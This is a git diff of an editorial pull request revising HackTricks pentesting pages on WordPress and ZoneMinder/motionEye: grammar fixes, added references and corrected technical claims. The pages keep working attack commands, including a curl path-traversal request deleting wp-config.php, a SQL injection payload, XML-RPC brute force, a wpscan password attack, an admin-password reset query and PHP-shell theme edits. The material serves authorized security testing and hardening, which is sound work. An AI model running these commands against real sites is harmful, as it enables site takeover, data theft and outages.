-- `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
-- `wp-sitemap.xml` In Wordpress versions 5.5 and greater, Worpress generates a sitemap XML file with all public posts and publicly queryable post types and taxonomies.
+- `wp-content/uploads/` is the default directory for uploaded media, although configuration and plugins can change its organization.
+- `wp-includes/` contains WordPress core libraries and assets; it should not be treated as a user-content directory.
+- Since WordPress 5.5, core exposes an XML sitemap index at `wp-sitemap.xml` for public posts and other publicly queryable content.<sup>[[23]](#references)</sup>
 
 **Post exploitation**
 
-- The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
+- The `wp-config.php` file contains information required by WordPress to connect to the database, such as the database name, host, username, and password, as well as authentication keys and salts and the database table prefix. It can also enable debugging settings, so disclosure of this file is especially sensitive.<sup>[[21]](#references)</sup>
 
-### Users Permissions
+### User roles
 
 - **Administrator**
-- **Editor**: Publish and manages his and others posts
-- **Author**: Publish and manage his own posts
-- **Contributor**: Write and manage his posts but cannot publish them
-- **Subscriber**: Browser posts and edit their profile
+- **Editor**: Can publish and manage their own and other users' posts.
+- **Author**: Can publish and manage their own posts.
+- **Contributor**: Can write and manage their own posts but cannot publish them.
+- **Subscriber**: Can read content and manage their own profile.
+
+These are the default roles; plugins and administrators can modify capabilities, so authorization testing should check capabilities rather than assume a role name has a fixed meaning.<sup>[[24]](#references)</sup>
 
 ## **Passive Enumeration**
 
@@ -81,7 +83,7 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
 ### Extract versions in general
 
 ```bash
-curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
+curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '\?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 
 ```
 
@@ -89,7 +91,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
 
 ### Plugins and Themes
 
-You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to **actively Brute Force a list of Plugins and Themes** (hopefully for us there are automated tools that contains this lists).
+Passive inspection will not necessarily reveal every installed plugin or theme. To expand coverage, actively enumerate candidate names from appropriate wordlists with tools that respect the assessment's request-rate limits.
 
 ### Users
 
@@ -99,7 +101,7 @@ You probably won't be able to find all the Plugins and Themes passible. In order
 curl -s -I -X GET http://blog.example.com/?author=1
 ```
 
-If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**.
+If the response is **200** or **30X**, the ID is **valid**. If the response is **400**, the ID is **invalid**.
 
 - **wp-json:** You can also try to get information about the users by querying:
 
@@ -121,9 +123,9 @@ Also note that **/wp-json/wp/v2/pages** could leak IP addresses.
 
 ### XML-RPC
 
-If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
+If `xmlrpc.php` is enabled, its methods may expose password-guessing and pingback abuse surfaces. For example, [wpxploit](https://github.com/relarizky/wpxploit) automates several XML-RPC checks. Apply strict rate limits and test only with authorization.
 
-To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
+To see whether it is active, request **`/xmlrpc.php`** and send this method call:
 
 **Check**
 
@@ -136,7 +138,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
 
 ![Users - XML-RPC: system.listMethods](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
 
-**Credentials Bruteforce**
+**Credential brute force**
 
 **`wp.getUserBlogs`**, **`wp.getCategories`** or **`metaWeblog.getUsersBlogs`** are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
 
@@ -156,7 +158,7 @@ The message _"Incorrect username or password"_ inside a 200 code response should
 
 ![Users - XML-RPC: The message "Incorrect username or password" inside a 200 code response should appear if the credentials aren't valid](<../../images/image (721).png>)
 
-Using the correct credentials you can upload a file. In the response the path will appears ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
+With valid credentials and sufficient capabilities, `wp.uploadFile` can upload media. A successful response includes the resulting path ([request example](https://gist.github.com/georgestephanis/5681982)).
 
 ```html
 <?xml version='1.0' encoding='utf-8'?>
@@ -198,8 +200,7 @@ This method is meant for programs and not for humans, and old, therefore it does
 
 **DDoS or port scanning**
 
-If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.\
-This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).
+If the method **`pingback.ping`** is available, it may make the WordPress server retrieve an attacker-selected HTTP(S) URL. Core uses URL validation intended to reduce SSRF, so reachable schemes, destinations, redirects, and response signals vary by version and configuration. Historically this feature has been abused for reflected traffic and limited internal-network probing.<sup>[[25]](#references)</sup>
 
 ```html
 <methodCall>
@@ -213,7 +214,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
 
 ![Users - XML-RPC: If you get faultCode with a value greater then 0 (17), it means the port is open](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
 
-If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
+Do not treat a single `faultCode` as definitive proof that a port is open. Compare controlled open and closed destinations and account for URL validation, application errors, timeouts, and intermediary behavior.
 
 Take a look to the use of **`system.multicall`** in the previous section to learn how to abuse this method to cause DDoS.
 
@@ -231,17 +232,15 @@ Take a look to the use of **`system.multicall`** in the previous section to lear
 
 ![WordPress XML-RPC pingback request with target and source blog post URLs](<../../images/image (110).png>)
 
-### wp-cron.php DoS
+### `wp-cron.php` load testing
 
-This file usually exists under the root of the Wordpress site: **`/wp-cron.php`**\
-When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.\
-Also, by default, the `wp-cron.php` is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
+This file normally exists at the WordPress root as **`/wp-cron.php`**. WordPress checks due scheduled events during page requests and may spawn a non-blocking request to this endpoint. The work performed depends on the scheduled hooks; repeated requests are not inherently a heavy database query, but expensive or poorly locked jobs can create avoidable load. Test this only in a controlled environment because load testing can affect availability.<sup>[[21]](#references)</sup>
 
-It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).
+For busy or latency-sensitive sites, administrators can set `DISABLE_WP_CRON` and invoke due events from a system scheduler at a controlled interval.<sup>[[21]](#references)</sup>
 
 ### /wp-json/oembed/1.0/proxy - SSRF
 
-Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ and the Worpress site may make a request to you.
+On versions/configurations where the oEmbed proxy route is exposed to the tested user, try `https://wordpress-site.example/wp-json/oembed/1.0/proxy?url=https://<collaborator-host>/`. Modern core routes the fetch through `wp_safe_remote_get()`, which validates the URL and redirects to reduce SSRF; authentication, nonce, allowlist, and network controls also affect reachability.<sup>[[25]](#references)</sup>
 
 This is the response when it doesn't work:
 
@@ -250,23 +249,19 @@ This is the response when it doesn't work:
 ## SSRF
 
 
-{{#ref}}
-https://github.com/t0gu/quickpress/blob/master/core/requests.go
-{{#endref}}
-
-This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
+[QuickPress](https://github.com/t0gu/quickpress) checks for the `pingback.ping` method and the `/wp-json/oembed/1.0/proxy` path, then tests the corresponding server-side request behavior.<sup>[[26]](#references)</sup>
 
 ## Automatic Tools
 
 ```bash
 cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
-wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
-#You can try to bruteforce the admin user using wpscan with "-U admin"
+wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt # Enumerate and test authorized accounts; API quotas vary
+# To test the admin account in an authorized assessment, add: -U admin
 ```
 
 ## Get access by overwriting a bit
 
-More than a real attack this is a curiosity. IN the CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) you could flip 1 bit from any wordpress file. So you could flip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation.
+This is a CTF-specific curiosity rather than a general WordPress attack. In [One-Bit-Man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man), the attacker could flip one bit in any WordPress file. Flipping the relevant byte in `/var/www/html/wp-includes/user.php` changed the password-check condition. The exact offset (`5389` in that challenge) is build-specific.
 
 ```php
     if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
@@ -283,7 +278,7 @@ Change the content for a php shell:
 
 ![Get access by overwriting a bit - Panel RCE: Change the content for a php shell](<../../images/image (384).png>)
 
-Search in internet how can you access that updated page. In this case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+Request the modified template through a route that renders it or, when the web server permits direct PHP execution in theme directories, access it directly. In this example the path is [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php).
 
 ### MSF
 
@@ -312,7 +307,7 @@ Upload plugin and press Install Now:
 
 ![Plugin RCE - PHP plugin: Upload plugin and press Install Now](<../../images/image (249).png>)
 
-Click on Procced:
+Click **Proceed**:
 
 ![Plugin RCE - PHP plugin: Upload plugin and press Install Now](<../../images/image (70).png>)
 
@@ -344,11 +339,11 @@ The content includes visual aids depicting the steps in the WordPress dashboard 
 
 ## From XSS to RCE
 
-- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ is a script designed to escalate a **Cross-Site Scripting (XSS)** vulnerability to **Remote Code Execution (RCE)** or other's criticals vulnerabilities in WordPress. For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). It provides **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**<sup>[[17]](#references)</sup>
-  - _**Privilege Escalation:**_ Creates an user in WordPress.
+- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike) is a script designed to escalate Cross-Site Scripting (XSS) to Remote Code Execution (RCE) or other critical impacts in WordPress. Its documented techniques target WordPress 4.x, 5.x, and 6.x, although applicability depends on the exact version, configuration, and current browser behavior:<sup>[[17]](#references)</sup>
+  - _**Privilege Escalation:**_ Creates a user in WordPress.
   - _**(RCE) Custom Plugin (backdoor) Upload:**_ Upload your custom plugin (backdoor) to WordPress.
-  - _**(RCE) Built-In Plugin Edit:**_ Edit a Built-In Plugins in WordPress.
-  - _**(RCE) Built-In Theme Edit:**_ Edit a Built-In Themes in WordPress.
+  - _**(RCE) Built-In Plugin Edit:**_ Edits a built-in plugin in WordPress.
+  - _**(RCE) Built-In Theme Edit:**_ Edits a built-in theme in WordPress.
   - _**(Custom) Custom Exploits:**_ Custom Exploits for Third-Party WordPress Plugins/Themes.
 
 ### Core login parser differential → DOM clobbering → RCE (XSS2Shell)
@@ -393,15 +388,15 @@ Change admin password:
 mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
 ```
 
-## Wordpress Plugins Pentest
+## WordPress plugin pentesting
 
 ### Attack Surface
 
-Knowing how a Wordpress plugin can expose functionality is key in order to find vulnerabilities on its functionality. You can find how a plugin might expose functionality in the following bullet points and some example of vulnerable plugins in [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).<sup>[[18]](#references)</sup>
+Understanding how a WordPress plugin exposes functionality is essential when auditing its attack surface. Common entry points are summarized below, with vulnerable examples discussed in the referenced research.<sup>[[18]](#references)</sup>
 
 - **`wp_ajax`**
 
-One of the ways a plugin can expose functions to uses if via AJAX handlers. These ones could contain logic, authorization, or authentication bugs. Moreover, it's kind of frquelty that these functions are going to base both the authentication and authorization in the existence of a wordpress nonce which **any user authenticated in the Wordpress instance might have** (independently of its role).
+Plugins can expose server-side functions through AJAX handlers. These callbacks may contain logic, authentication, or authorization bugs. A recurring mistake is treating possession of a WordPress nonce as proof that the caller has permission to perform the action.
 
 These are the functions that can be used to expose a function in a plugin:
 
@@ -410,14 +405,15 @@ add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
 add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
 ```
 
-**The use of `nopriv` makes the endpoint accessible by any users (even unathenticated ones).**
+**Registering the `wp_ajax_nopriv_` hook makes the callback reachable by unauthenticated users.**
 
 > [!CAUTION]
-> Moreover, if the function is just checking the authorization of the user with the function `wp_verify_nonce`, this function is just checking the user is loggedin, it isn't usually checking the role of the user. So low privileged users might have access to high privileged actions.
+> [!CAUTION]
+> `wp_verify_nonce()` validates a time-limited CSRF token associated with an action and user context; it does **not** authorize the action or simply prove that a user has a particular role. Pair nonce validation with an appropriate capability check such as `current_user_can()`.<sup>[[27]](#references)</sup>
 
 - **REST API**
 
-It's also possible to expose functions from wordpress registering a rest AP using the `register_rest_route` function:
+Plugins can also expose functions through the REST API by calling `register_rest_route()`:
 
 ```php
 register_rest_route(
@@ -435,7 +431,7 @@ The `permission_callback` is a callback to function that checks if a given user 
 
 - **Direct access to the php file**
 
-Of course, Wordpress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin is exposing any vulnerable functionality that is triggered just accessing the file, it's going to be exploitable by any user.
+WordPress uses PHP, and web-server configuration often makes files under plugin directories directly addressable. A plugin file that performs sensitive work when requested directly, without bootstrapping WordPress authorization or rejecting direct access, may therefore expose that functionality to unauthenticated users.
 
 ### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
 
@@ -462,7 +458,7 @@ Content-Length: 114
 Why it works
 
 - The plugin maps a client-controlled header to authentication state and skips capability checks.
-- WordPress core expects `create_users` capability for this route; the plugin hack bypasses it by directly setting the current user context from the header.
+- WordPress core checks the appropriate user-creation capabilities for this route; the vulnerable plugin bypasses the intended authentication boundary by setting the current user context directly from the header.
 
 Expected success indicators
 
@@ -512,15 +508,15 @@ Issues introduced by this snippet:
 
 #### Exploitation
 
-An attacker can delete any file or directory **below the uploads base directory** (normally `<wp-root>/wp-content/uploads/`) by sending a single HTTP POST request:
+The traversal lets an attacker escape the intended `litho-fonts` directory and delete files writable by the PHP/web-server account. On a typical layout, the following request targets `wp-config.php`:
 
 ```bash
 curl -X POST https://victim.com/wp-admin/admin-ajax.php \
      -d 'action=litho_remove_font_family_action_data' \
-     -d 'fontfamily=../../../../wp-config.php'
+     -d 'fontfamily=../../../wp-config.php'
 ```
 
-Because `wp-config.php` lives outside *uploads*, four `../` sequences are enough on a default installation.  Deleting `wp-config.php` forces WordPress into the *installation wizard* on the next visit, enabling a full site take-over (the attacker merely supplies a new DB configuration and creates an admin user).
+From `<wp-root>/wp-content/uploads/litho-fonts/`, three `../` sequences reach the WordPress root. The required depth varies with the configured upload path. Deleting `wp-config.php` causes an outage and may expose a reconfiguration/install flow; turning that into takeover additionally depends on filesystem permissions and the attacker's ability to provide a reachable database configuration.
 
 Other impactful targets include plugin/theme `.php` files (to break security plugins) or `.htaccess` rules.
 
@@ -653,15 +649,20 @@ Defensive notes
 
 ### Regular Updates
 
-Make sure WordPress, plugins, and themes are up to date. Also confirm that automated updating is enabled in wp-config.php:
+Keep WordPress core, plugins, and themes up to date, with staging and backups appropriate to the deployment. Core updates can be configured in `wp-config.php`:
 
 ```bash
 define( 'WP_AUTO_UPDATE_CORE', true );
+```
+
+Plugin and theme update filters belong in a plugin—preferably a must-use plugin—not directly in `wp-config.php`, because WordPress is not fully loaded there:<sup>[[28]](#references)</sup>
+
+```php
 add_filter( 'auto_update_plugin', '__return_true' );
 add_filter( 'auto_update_theme', '__return_true' );
 ```
 
-Also, **only install trustable WordPress plugins and themes**.
+Only install trusted, maintained WordPress plugins and themes, and remove components that are no longer needed.<sup>[[29]](#references)</sup>
 
 ### Security Plugins
 
@@ -671,11 +672,11 @@ Also, **only install trustable WordPress plugins and themes**.
 
 ### **Other Recommendations**
 
-- Remove default **admin** user
-- Use **strong passwords** and **2FA**
-- Periodically **review** users **permissions**
-- **Limit login attempts** to prevent Brute Force attacks
-- Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
+- Rename or remove a predictable legacy **admin** account after ensuring another administrator exists; changing the username alone is not a primary defense.
+- Use **strong, unique passwords** and **2FA**.
+- Periodically review users and capabilities.
+- Rate-limit login attempts and monitor password guessing.
+- Restrict `/wp-login.php` and sensitive `/wp-admin/` routes by network or an additional authentication layer where operationally appropriate. Do not rename a nonexistent `wp-admin.php` core file, and account for required public endpoints such as `wp-admin/admin-ajax.php`.<sup>[[29]](#references)</sup>
 
 ### Unauthenticated SQL Injection via insufficient validation (WP Job Portal <= 2.3.2)
 
@@ -711,7 +712,7 @@ Issues introduced by this snippet:
         -d 'parentid=0 OR 1=1-- -' \
         -d 'cat_title=pwn' -d 'id='
    ```
-   The response discloses the result of the injected query or alters the database, proving SQLi.
+   Confirm the injection using the response behavior documented for the affected version (for example, a controlled boolean or time-based difference); this particular query path does not inherently print arbitrary selected columns.
 
 ### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
 
@@ -809,7 +810,7 @@ Finding the action name
 
 Detection checklist
 
-- Web logs showing unauthenticated POSTs to /wp-admin/admin-ajax.php with the social-login action and id=<email>.
+- Web logs showing unauthenticated `POST` requests to `/wp-admin/admin-ajax.php` with the social-login action and `id=<email>`.
 - 200 responses with the success JSON immediately preceding authenticated traffic from the same IP/User-Agent.
 
 Hardening
@@ -859,7 +860,7 @@ Detection checklist
 Hardening
 - For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability
 - Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use
-- Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can(<cap>)
+- Validate the caller's user context (`wp_set_current_user` is insufficient on its own) and reject requests where `!is_user_logged_in() || !current_user_can(<cap>)`.
 
 ---
 
@@ -1016,4 +1017,13 @@ Hardening
 - [18] [nowotarski.info - Wordpress Nonce Authorization](https://nowotarski.info/wordpress-nonce-authorization)
 - [19] [XSS2Shell: WordPress Preauth XSS to RCE Chain](https://pwn.ai/blog/xss2shell)
 - [20] [WordPress 7.0.3 security release](https://wordpress.org/news/2026/08/wordpress-7-0-3-release/)
+- [21] [Editing `wp-config.php` – WordPress Advanced Administration Handbook](https://developer.wordpress.org/advanced-administration/wordpress/wp-config/)
+- [22] [WordPress XML-RPC API and server implementation](https://developer.wordpress.org/reference/classes/wp_xmlrpc_server/)
+- [23] [New XML Sitemaps Functionality in WordPress 5.5](https://make.wordpress.org/core/2020/07/22/new-xml-sitemaps-functionality-in-wordpress-5-5/)
+- [24] [WordPress User Roles and Capabilities](https://developer.wordpress.org/apis/security/user-roles-and-capabilities/)
+- [25] [`wp_xmlrpc_server::pingback_ping()` and safe remote URL validation](https://developer.wordpress.org/reference/classes/wp_xmlrpc_server/pingback_ping/)
+- [26] [QuickPress WordPress request checks](https://github.com/t0gu/quickpress/blob/master/core/requests.go)
+- [27] [WordPress nonces are not authorization](https://developer.wordpress.org/apis/security/nonces/)
+- [28] [Configuring WordPress automatic background updates](https://developer.wordpress.org/advanced-administration/upgrade/upgrading/)
+- [29] [Hardening WordPress](https://developer.wordpress.org/advanced-administration/security/hardening/)
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/zoneminder-motioneye-motion.md
+++ b/src/network-services-pentesting/pentesting-web/zoneminder-motioneye-motion.md
@@ -19,6 +19,8 @@ After host access, the most interesting files are commonly:
 
 ## ZoneMinder
 
+ZoneMinder is an open-source video-surveillance platform; its source tree is useful for mapping routes, database access, authentication, and version-specific behavior during an authorized review.<sup>[[2]](#references)</sup>
+
 ### Default credentials and versioning
 
 ZoneMinder is commonly worth checking for:
@@ -65,7 +67,7 @@ sqlmap -r removetag.request -p tid --batch \
   -D zm -T Users -C Username,Password,Name,Email --dump
 ```
 
-This is specially useful when the application gives a better **Boolean** signal than sqlmap initially discovers by itself.
+This is especially useful when the application provides a better **Boolean** signal than sqlmap initially discovers by itself.
 
 ### Turning app SQLi into OS access
 
@@ -97,7 +99,7 @@ If **`tcpdump`** has **`cap_net_raw`** (or **`cap_net_admin,cap_net_raw`**), cap
 timeout 120 tcpdump -i any -w /tmp/capture.pcap
 ```
 
-This is specially valuable when:
+This is especially valuable when:
 
 - loopback / bridge services are doing **cleartext internal auth**
 - Docker bridges expose custom management channels
@@ -110,6 +112,8 @@ Review the pcap in Wireshark and prioritise:
 - **Follow TCP Stream** on local / container management ports
 
 ## motionEye / Motion
+
+motionEye is a web frontend for the Motion daemon. Review both projects because a value validated or signed by motionEye can later be written to Motion configuration and consumed under Motion's own parsing and hook semantics.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ### Signed requests + client-side-only validation
 


### PR DESCRIPTION
Reviews 50 reserved HackTricks pages for numbered references and citation coverage, duplicate content, grammar, syntax, and technical accuracy. Preserves the beginning/end banners and all useful technical material.\n\nValidation: full mdBook build, internal links, reference numbering/usage, banner counts, code fences, duplicate reference URLs, duplicate long paragraphs, scope, and diff checks.